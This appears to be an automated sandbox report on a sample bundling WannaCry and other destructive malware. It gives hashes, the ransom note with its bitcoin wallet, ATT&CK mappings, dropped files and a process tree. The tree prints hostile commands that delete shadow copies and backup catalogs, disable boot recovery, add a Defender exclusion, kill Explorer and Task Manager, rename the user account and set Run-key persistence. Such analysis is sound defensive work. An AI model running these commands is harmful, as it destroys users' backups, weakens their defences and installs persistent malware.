Analysis

  • max time kernel
    15s
  • max time network
    73s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-01-2023 19:05

General

  • Target

    DEADLY.exe

  • Size

    24.2MB

  • MD5

    6d4bb02205c4206a53e2567d9feeb567

  • SHA1

    5abd02eac7b35332067bc67d66dc70484d565703

  • SHA256

    7224da6282de5d67b0e6ee4a29a746ddcfd6fa9dea36ee4b2fad4b39a48d68a1

  • SHA512

    ec4b624ad738ef3421899a4a0a0d5a2b15743c45f6b87abdca77ce8f67a9ce4e6934a888d43dbf441b7ad23a3865a3a8b68a67d332c1d0e61b637b40cf78ac20

  • SSDEEP

    393216:ebDuO/sPrggW5mlXb5K842cuwGyjzT8I3A666Sq6nrS44OUEhe:eGGvy4n2cuW/3VS8DOnc

Malware Config

Extracted

Path

C:\Windows\@Please_Read_Me@.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Executes dropped EXE 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 53 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DEADLY.exe
    "C:\Users\Admin\AppData\Local\Temp\DEADLY.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAYwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVAAgAHMAIwA3ADcANwA3ACAASgB1AHMAdAAgAE0AZQBsAHQAZQBkACAAVQByACAAUABjACAAQQBuAGQAIABXAGgAaQBwAGUAZAAgAEEAbABsACAAVQByACAARABhAHQAYQAgAEIAdQByAG4AaQBuAGcAIABEAHIAaQB2AGUALgAuAC4AJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAGwAbgAjAD4A"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:540
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeABuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQB4ACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4628
    • C:\Windows\000.exe
      "C:\Windows\000.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Modifies WinLogon
      • Sets desktop wallpaper using registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4896
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3900
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im explorer.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3384
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im taskmgr.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3420
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic useraccount where name='Admin' set FullName='UR NEXT'
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5084
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic useraccount where name='Admin' rename 'UR NEXT'
          4⤵
            PID:3740
          • C:\Windows\SysWOW64\shutdown.exe
            shutdown /f /r /t 0
            4⤵
              PID:1428
        • C:\Windows\MEMZ-Destructive.exe
          "C:\Windows\MEMZ-Destructive.exe"
          2⤵
          • Executes dropped EXE
          PID:4796
        • C:\Windows\Monoxidex64.exe
          "C:\Windows\Monoxidex64.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:384
          • C:\Users\Admin\AppData\Local\Temp\隫粹瞓蟣岗諡篌褙顈幱呍閷昵鐢溬玜.exe
            "C:\Users\Admin\AppData\Local\Temp\隫粹瞓蟣岗諡篌褙顈幱呍閷昵鐢溬玜.exe"
            3⤵
            • Executes dropped EXE
            PID:2244
        • C:\Windows\NoEscape.exe
          "C:\Windows\NoEscape.exe"
          2⤵
          • Executes dropped EXE
          PID:532
        • C:\Windows\vc_redist.x86.exe
          "C:\Windows\vc_redist.x86.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2164
          • C:\Windows\vc_redist.x86.exe
            "C:\Windows\vc_redist.x86.exe" -burn.unelevated BurnPipe.{8490563D-7EDA-43B2-BC0A-338073BECA4C} {307B83A8-72AA-413B-9CBF-40CF79FF50BD} 2164
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:3096
        • C:\Windows\WannaCrypt0r.exe
          "C:\Windows\WannaCrypt0r.exe"
          2⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:4760
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h .
            3⤵
            • Views/modifies file attributes
            PID:4300
          • C:\Windows\SysWOW64\icacls.exe
            icacls . /grant Everyone:F /T /C /Q
            3⤵
            • Modifies file permissions
            PID:396
          • C:\Windows\taskdl.exe
            taskdl.exe
            3⤵
            • Executes dropped EXE
            PID:3432
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c 121951674763575.bat
            3⤵
            • Drops file in Windows directory
            • Suspicious use of WriteProcessMemory
            PID:2812
            • C:\Windows\SysWOW64\cscript.exe
              cscript.exe //nologo m.vbs
              4⤵
              • Drops file in Windows directory
              PID:2632
          • C:\Windows\@WanaDecryptor@.exe
            @WanaDecryptor@.exe co
            3⤵
              PID:3432
              • C:\Windows\TaskData\Tor\taskhsvc.exe
                TaskData\Tor\taskhsvc.exe
                4⤵
                  PID:3744
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c start /b @WanaDecryptor@.exe vs
                3⤵
                  PID:3756
                  • C:\Windows\@WanaDecryptor@.exe
                    @WanaDecryptor@.exe vs
                    4⤵
                      PID:3112
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                        5⤵
                          PID:2084
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic shadowcopy delete
                            6⤵
                              PID:3892
                      • C:\Windows\taskse.exe
                        taskse.exe C:\Windows\@WanaDecryptor@.exe
                        3⤵
                          PID:1852
                        • C:\Windows\@WanaDecryptor@.exe
                          @WanaDecryptor@.exe
                          3⤵
                            PID:5068
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "swneyqrjnjqirt647" /t REG_SZ /d "\"C:\Windows\tasksche.exe\"" /f
                            3⤵
                              PID:4116
                              • C:\Windows\SysWOW64\reg.exe
                                reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "swneyqrjnjqirt647" /t REG_SZ /d "\"C:\Windows\tasksche.exe\"" /f
                                4⤵
                                • Modifies registry key
                                PID:4856
                            • C:\Windows\taskdl.exe
                              taskdl.exe
                              3⤵
                                PID:4260
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            1⤵
                              PID:4644
                            • C:\Windows\system32\LogonUI.exe
                              "LogonUI.exe" /flags:0x4 /state0:0xa39f9855 /state1:0x41c64e6d
                              1⤵
                                PID:3760

                              Network

                              MITRE ATT&CK Matrix ATT&CK v6

                              Persistence

                              Winlogon Helper DLL

                              1
                              T1004

                              Hidden Files and Directories

                              1
                              T1158

                              Defense Evasion

                              File Deletion

                              1
                              T1107

                              File Permissions Modification

                              1
                              T1222

                              Modify Registry

                              3
                              T1112

                              Hidden Files and Directories

                              1
                              T1158

                              Discovery

                              Query Registry

                              3
                              T1012

                              System Information Discovery

                              3
                              T1082

                              Peripheral Device Discovery

                              1
                              T1120

                              Impact

                              Inhibit System Recovery

                              1
                              T1490

                              Defacement

                              1
                              T1491

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Temp\rniw.exe
                                Filesize

                                76KB

                                MD5

                                9232120b6ff11d48a90069b25aa30abc

                                SHA1

                                97bb45f4076083fca037eee15d001fd284e53e47

                                SHA256

                                70faa0e1498461731f873d3594f20cbf2beaa6f123a06b66f9df59a9cdf862be

                                SHA512

                                b06688a9fc0b853d2895f11e812c48d5871f2793183fda5e9638ded22fc5dc1e813f174baedc980a1f0b6a7b0a65cd61f29bb16acc6dd45da62988eb012d6877

                              • C:\Users\Admin\AppData\Local\Temp\windl.bat
                                Filesize

                                771B

                                MD5

                                a9401e260d9856d1134692759d636e92

                                SHA1

                                4141d3c60173741e14f36dfe41588bb2716d2867

                                SHA256

                                b551fba71dfd526d4916ae277d8686d83fff36d22fcf6f18457924a070b30ef7

                                SHA512

                                5cbe38cdab0283b87d9a9875f7ba6fa4e8a7673d933ca05deddddbcf6cf793bd1bf34ac0add798b4ed59ab483e49f433ce4012f571a658bc0add28dd987a57b6

                              • C:\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\wixstdba.dll
                                Filesize

                                118KB

                                MD5

                                4d20a950a3571d11236482754b4a8e76

                                SHA1

                                e68bd784ac143e206d52ecaf54a7e3b8d4d75c9c

                                SHA256

                                a9295ad4e909f979e2b6cb2b2495c3d35c8517e689cd64a918c690e17b49078b

                                SHA512

                                8b9243d1f9edbcbd6bdaf6874dc69c806bb29e909bd733781fde8ac80ca3fff574d786ca903871d1e856e73fd58403bebb58c9f23083ea7cd749ba3e890af3d2

                              • C:\Users\Admin\AppData\Local\Temp\隫粹瞓蟣岗諡篌褙顈幱呍閷昵鐢溬玜.exe
                                Filesize

                                330KB

                                MD5

                                692361071bbbb3e9243d09dc190fedea

                                SHA1

                                04894c41500859ea3617b0780f1cc2ba82a40daf

                                SHA256

                                ae9405b9556c24389ee359993f45926a895481c8d60d98b91a3065f5c026cffe

                                SHA512

                                cfdd627d228c89a4cc2eac27dcdc45507f1e4265eff108958de0e26e0d1abe7598a5347be77d1a52256de70c77129f1cd0e9b31c023e1263f4cf04dbc689c87e

                              • C:\Users\Admin\AppData\Local\Temp\隫粹瞓蟣岗諡篌褙顈幱呍閷昵鐢溬玜.exe
                                Filesize

                                330KB

                                MD5

                                692361071bbbb3e9243d09dc190fedea

                                SHA1

                                04894c41500859ea3617b0780f1cc2ba82a40daf

                                SHA256

                                ae9405b9556c24389ee359993f45926a895481c8d60d98b91a3065f5c026cffe

                                SHA512

                                cfdd627d228c89a4cc2eac27dcdc45507f1e4265eff108958de0e26e0d1abe7598a5347be77d1a52256de70c77129f1cd0e9b31c023e1263f4cf04dbc689c87e

                              • C:\Users\Admin\AppData\Local\Temp\隫粹瞓蟣岗諡篌褙顈幱呍閷昵鐢溬玜.txt
                                Filesize

                                260B

                                MD5

                                a312c08758c8b8a43f2f12e875d956a7

                                SHA1

                                f664a4ac4fc6bb93a787a5b659dffe05a1ffc6af

                                SHA256

                                c27b20bcee097f7b056dfa040363dad160fc81f699ff019eb0d59ced0f10f20f

                                SHA512

                                2fd9946f3f7cf152ee72659fd3ebc0647e5f0d5e1c8e8041c49140b35fb9577fbd81da9f98b6a878d3789650df6b93a00f5c4f94fa13231a825bf4b4c623de63

                              • C:\Users\Admin\Desktop\@Please_Read_Me@.txt
                                Filesize

                                933B

                                MD5

                                7a2726bb6e6a79fb1d092b7f2b688af0

                                SHA1

                                b3effadce8b76aee8cd6ce2eccbb8701797468a2

                                SHA256

                                840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

                                SHA512

                                4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

                              • C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                Filesize

                                240KB

                                MD5

                                7bf2b57f2a205768755c07f238fb32cc

                                SHA1

                                45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                SHA256

                                b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                SHA512

                                91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                              • C:\Users\Admin\Desktop\ConfirmExport.7z
                                Filesize

                                1.0MB

                                MD5

                                f7afa03da09574f66200731782622a9e

                                SHA1

                                2e4a99bafb15e4d444bbe748f0530d042d9ae71b

                                SHA256

                                f56158bcfb3fe4db569b7a7c3230d656b053fa92a46db0d88f79bb100bd86f8f

                                SHA512

                                5f9cbdfb114f048fb3bed233b3aff2fd87ded42ca8b542a73d034c6a274aaa8cca3341548439b9f0a08266583041608fae934997b351244c0004db0a5ee1f0e2

                              • C:\Users\Admin\Desktop\ConfirmExport.7z.WNCRY
                                Filesize

                                1.0MB

                                MD5

                                3de246052219a4a45450407ca226deb1

                                SHA1

                                5c0166c9b0fb6206337c0d1f42eff5a3972fd2fc

                                SHA256

                                1eaa104e6f54eceb8d27dff29edac5d4f6bd19988c298b7705ac1c7d639350c0

                                SHA512

                                ef69374a8961cdcb260b3d6a33abcfec10e4b0b5ecb18badae2b7734f07b8e5044756317831b7a7d0d7f8e8ceb08115d526f191be0fab61c34432c49e9d5d812

                              • C:\Users\Admin\Desktop\DisconnectPush.mpg
                                Filesize

                                1.1MB

                                MD5

                                382e1b6577bc01128012dd8a24d17f99

                                SHA1

                                2c72c381d5fd9cacb0708e9757b2a2798eb446ce

                                SHA256

                                092f5e9dfb4ae15d1f7eb362fca0eaee3a357c3fef8ed5a8513d59f8b7809816

                                SHA512

                                33bc8e5f502162f40045f44c0d35a945eb5e29e8163a3b02b8fe5e6d6af569d30f9b92d150b993e6a44bd88eb59dee074ac026a625423e8635842954eee86486

                              • C:\Users\Admin\Desktop\DisconnectPush.mpg.WNCRY
                                Filesize

                                1.1MB

                                MD5

                                e27addc01aa4682d7536a313fd72ea4a

                                SHA1

                                379ad0143194715e89263f98711661ac7d8e46dd

                                SHA256

                                b9029a2bfb4dad9403dcc37c41cb31684c548395111c1122df57079e8d1bb5a0

                                SHA512

                                c51f90b7099e0674ced717ba889b2ce821de7cacd460925cdce11666aec7ae61dff9e3819fc3c9c3a1f841862a84d22fe8c6f2d87cc9c45407df8c6e5ad95896

                              • C:\Users\Admin\Desktop\LimitJoin.mp4
                                Filesize

                                878KB

                                MD5

                                4e356152e5d88fe14cc35a7652b9bf75

                                SHA1

                                109bb236b4192b27aed4f1720203aa4c6414cad7

                                SHA256

                                4b7a1174c1cef203a2fa5d53b40399a8673734cfb47a4ad1f42d7508d9e1105b

                                SHA512

                                61ff6fd29a58935b3dfb08b1aa81c81f844712c815de468c18fa477de143398d3d07a298e18a650f0a43c03afbe66b8f7d2a50129a39f31826f397e5e6a9fa09

                              • C:\Users\Admin\Desktop\LimitJoin.mp4.WNCRY
                                Filesize

                                878KB

                                MD5

                                aa63a9c01fda0d0d178754b2519b5205

                                SHA1

                                f782ce38653e941ccfccb3c25487eaf6422fff5d

                                SHA256

                                618075297da55a4cf36c3fb967bef50adae59d715eb5647c7b85e72b26a747f7

                                SHA512

                                33ace869e6572836cfad1a84577983377e9f48ec815ce52fddec51560debe27057046d290ec2835be47670a11834dab58c6b64b9f55e912e911d344b2579b5f3

                              • C:\Windows\000.exe
                                Filesize

                                6.7MB

                                MD5

                                f2b7074e1543720a9a98fda660e02688

                                SHA1

                                1029492c1a12789d8af78d54adcb921e24b9e5ca

                                SHA256

                                4ea1f2ecf7eb12896f2cbf8683dae8546d2b8dc43cf7710d68ce99e127c0a966

                                SHA512

                                73f9548633bc38bab64b1dd5a01401ef7f5b139163bdf291cc475dbd2613510c4c5e4d7702ecdfa74b49f3c9eaed37ed23b9d8f0064c66123eb0769c8671c6ff

                              • C:\Windows\000.exe
                                Filesize

                                6.7MB

                                MD5

                                f2b7074e1543720a9a98fda660e02688

                                SHA1

                                1029492c1a12789d8af78d54adcb921e24b9e5ca

                                SHA256

                                4ea1f2ecf7eb12896f2cbf8683dae8546d2b8dc43cf7710d68ce99e127c0a966

                                SHA512

                                73f9548633bc38bab64b1dd5a01401ef7f5b139163bdf291cc475dbd2613510c4c5e4d7702ecdfa74b49f3c9eaed37ed23b9d8f0064c66123eb0769c8671c6ff

                              • C:\Windows\121951674763575.bat
                                Filesize

                                294B

                                MD5

                                d47c2fdbbec44ff8a2c7f20c480d5b78

                                SHA1

                                bdc36aa2b0f830d5d111a475d42690a6979c07b1

                                SHA256

                                fc3371436a9d883f2bca7e6a7eff811d8aab5107f5866bb6dd560e8d1f69fb1e

                                SHA512

                                e68b2ca0f2b6c2d809e8581813c9eee21d97cb3f6fcc13fb421c1386104bbfbc83087a081ab79c5fc43d0e4748839775836c164d01a863e6c46a12eec0a42bea

                              • C:\Windows\@WanaDecryptor@.exe
                                Filesize

                                240KB

                                MD5

                                7bf2b57f2a205768755c07f238fb32cc

                                SHA1

                                45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                SHA256

                                b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                SHA512

                                91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                              • C:\Windows\@WanaDecryptor@.exe.lnk
                                Filesize

                                805B

                                MD5

                                75a1d6c1bb7e333204e0e5165a46fd86

                                SHA1

                                bdae7b7e2407b6866b50f6263260f017882fdb91

                                SHA256

                                c70fd63edc688f07023762dd2d89e684b0e8623ad0296eb765b63ff4e1c180dc

                                SHA512

                                da2a74619426797afa5920c16cf1ce54c5198f8bc501d68901b81851598b8088c288c1891178b8d27626e42ff81dd597e80a289910d3c634cb8dfeea39315f6d

                              • C:\Windows\MEMZ-Destructive.exe
                                Filesize

                                14KB

                                MD5

                                19dbec50735b5f2a72d4199c4e184960

                                SHA1

                                6fed7732f7cb6f59743795b2ab154a3676f4c822

                                SHA256

                                a3d5715a81f2fbeb5f76c88c9c21eeee87142909716472f911ff6950c790c24d

                                SHA512

                                aa8a6bbb1ec516d5d5acf8be6863a4c6c5d754cee12b3d374c3a6acb393376806edc422f0ffb661c210e5b9485da88521e4a0956a4b7b08a5467cfaacd90591d

                              • C:\Windows\MEMZ-Destructive.exe
                                Filesize

                                14KB

                                MD5

                                19dbec50735b5f2a72d4199c4e184960

                                SHA1

                                6fed7732f7cb6f59743795b2ab154a3676f4c822

                                SHA256

                                a3d5715a81f2fbeb5f76c88c9c21eeee87142909716472f911ff6950c790c24d

                                SHA512

                                aa8a6bbb1ec516d5d5acf8be6863a4c6c5d754cee12b3d374c3a6acb393376806edc422f0ffb661c210e5b9485da88521e4a0956a4b7b08a5467cfaacd90591d

                              • C:\Windows\Monoxidex64.exe
                                Filesize

                                330KB

                                MD5

                                692361071bbbb3e9243d09dc190fedea

                                SHA1

                                04894c41500859ea3617b0780f1cc2ba82a40daf

                                SHA256

                                ae9405b9556c24389ee359993f45926a895481c8d60d98b91a3065f5c026cffe

                                SHA512

                                cfdd627d228c89a4cc2eac27dcdc45507f1e4265eff108958de0e26e0d1abe7598a5347be77d1a52256de70c77129f1cd0e9b31c023e1263f4cf04dbc689c87e

                              • C:\Windows\Monoxidex64.exe
                                Filesize

                                330KB

                                MD5

                                692361071bbbb3e9243d09dc190fedea

                                SHA1

                                04894c41500859ea3617b0780f1cc2ba82a40daf

                                SHA256

                                ae9405b9556c24389ee359993f45926a895481c8d60d98b91a3065f5c026cffe

                                SHA512

                                cfdd627d228c89a4cc2eac27dcdc45507f1e4265eff108958de0e26e0d1abe7598a5347be77d1a52256de70c77129f1cd0e9b31c023e1263f4cf04dbc689c87e

                              • C:\Windows\NoEscape.exe
                                Filesize

                                666KB

                                MD5

                                989ae3d195203b323aa2b3adf04e9833

                                SHA1

                                31a45521bc672abcf64e50284ca5d4e6b3687dc8

                                SHA256

                                d30d7676a3b4c91b77d403f81748ebf6b8824749db5f860e114a8a204bca5b8f

                                SHA512

                                e9d4e6295869f3a456c7ea2850c246d0c22afa65c2dd5161744ee5b3e29e44d9a2d758335f98001cdb348eaa51a71cd441b4ddc12c8d72509388657126e69305

                              • C:\Windows\NoEscape.exe
                                Filesize

                                666KB

                                MD5

                                989ae3d195203b323aa2b3adf04e9833

                                SHA1

                                31a45521bc672abcf64e50284ca5d4e6b3687dc8

                                SHA256

                                d30d7676a3b4c91b77d403f81748ebf6b8824749db5f860e114a8a204bca5b8f

                                SHA512

                                e9d4e6295869f3a456c7ea2850c246d0c22afa65c2dd5161744ee5b3e29e44d9a2d758335f98001cdb348eaa51a71cd441b4ddc12c8d72509388657126e69305

                              • C:\Windows\WannaCrypt0r.exe
                                Filesize

                                3.4MB

                                MD5

                                84c82835a5d21bbcf75a61706d8ab549

                                SHA1

                                5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                SHA256

                                ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                SHA512

                                90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                              • C:\Windows\b.wnry
                                Filesize

                                1.4MB

                                MD5

                                c17170262312f3be7027bc2ca825bf0c

                                SHA1

                                f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                SHA256

                                d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                SHA512

                                c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                              • C:\Windows\c.wnry
                                Filesize

                                780B

                                MD5

                                8124a611153cd3aceb85a7ac58eaa25d

                                SHA1

                                c1d5cd8774261d810dca9b6a8e478d01cd4995d6

                                SHA256

                                0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

                                SHA512

                                b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

                              • C:\Windows\m.vbs
                                Filesize

                                173B

                                MD5

                                ba154b334c24caf4cbc7f336056b0bf8

                                SHA1

                                8da3ed13f0888508ff73ad694f751053653ddba0

                                SHA256

                                3fa9fb8893d692497cc0dee5a60e2fb74aa8ca24a92892f2366e55949718e384

                                SHA512

                                68d6219abfe1c16d73fd261e9e3eaadf2ed9a2435b0faad785127cb309b082f4be0f5ba030c084704855b06c6975ae1fcb87e6fd5bbbd599623e9c2dd2512cb1

                              • C:\Windows\msg\m_bulgarian.wnry
                                Filesize

                                46KB

                                MD5

                                95673b0f968c0f55b32204361940d184

                                SHA1

                                81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                SHA256

                                40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                SHA512

                                7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                              • C:\Windows\msg\m_chinese (simplified).wnry
                                Filesize

                                53KB

                                MD5

                                0252d45ca21c8e43c9742285c48e91ad

                                SHA1

                                5c14551d2736eef3a1c1970cc492206e531703c1

                                SHA256

                                845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                SHA512

                                1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                              • C:\Windows\msg\m_chinese (traditional).wnry
                                Filesize

                                77KB

                                MD5

                                2efc3690d67cd073a9406a25005f7cea

                                SHA1

                                52c07f98870eabace6ec370b7eb562751e8067e9

                                SHA256

                                5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                SHA512

                                0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                              • C:\Windows\msg\m_croatian.wnry
                                Filesize

                                38KB

                                MD5

                                17194003fa70ce477326ce2f6deeb270

                                SHA1

                                e325988f68d327743926ea317abb9882f347fa73

                                SHA256

                                3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                                SHA512

                                dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                              • C:\Windows\msg\m_czech.wnry
                                Filesize

                                39KB

                                MD5

                                537efeecdfa94cc421e58fd82a58ba9e

                                SHA1

                                3609456e16bc16ba447979f3aa69221290ec17d0

                                SHA256

                                5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                                SHA512

                                e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                              • C:\Windows\msg\m_danish.wnry
                                Filesize

                                36KB

                                MD5

                                2c5a3b81d5c4715b7bea01033367fcb5

                                SHA1

                                b548b45da8463e17199daafd34c23591f94e82cd

                                SHA256

                                a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                                SHA512

                                490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                              • C:\Windows\msg\m_dutch.wnry
                                Filesize

                                36KB

                                MD5

                                7a8d499407c6a647c03c4471a67eaad7

                                SHA1

                                d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                                SHA256

                                2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                                SHA512

                                608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                              • C:\Windows\msg\m_english.wnry
                                Filesize

                                36KB

                                MD5

                                fe68c2dc0d2419b38f44d83f2fcf232e

                                SHA1

                                6c6e49949957215aa2f3dfb72207d249adf36283

                                SHA256

                                26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                                SHA512

